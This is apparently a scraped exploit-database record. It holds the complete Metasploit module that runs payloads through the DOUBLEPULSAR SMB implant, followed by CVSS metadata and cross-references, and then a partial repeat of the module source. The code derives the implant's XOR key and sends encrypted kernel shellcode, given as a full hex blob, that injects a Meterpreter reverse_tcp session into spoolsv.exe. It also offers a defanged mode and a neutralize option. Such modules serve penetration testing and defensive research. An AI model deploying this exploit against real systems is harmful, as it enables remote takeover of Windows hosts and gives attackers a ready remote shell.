module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-31] #"}, "lastseen": "2021-10-30T23:13:26", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "855f156e6fc61297b06d7c3cd1dc7671", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-11-01T00:14:28", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T00:14:28", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-01T00:14:28", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n 